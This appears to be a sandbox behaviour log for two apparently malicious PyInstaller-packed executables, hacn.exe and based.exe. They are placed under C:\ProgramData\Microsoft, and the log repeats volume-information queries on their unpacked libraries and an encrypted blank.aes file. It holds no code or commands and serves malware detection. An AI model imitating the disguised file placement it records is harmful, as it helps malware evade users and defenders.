Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\python310.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\_decimal.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\libssl-1_1.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\sqlite3.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\select.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
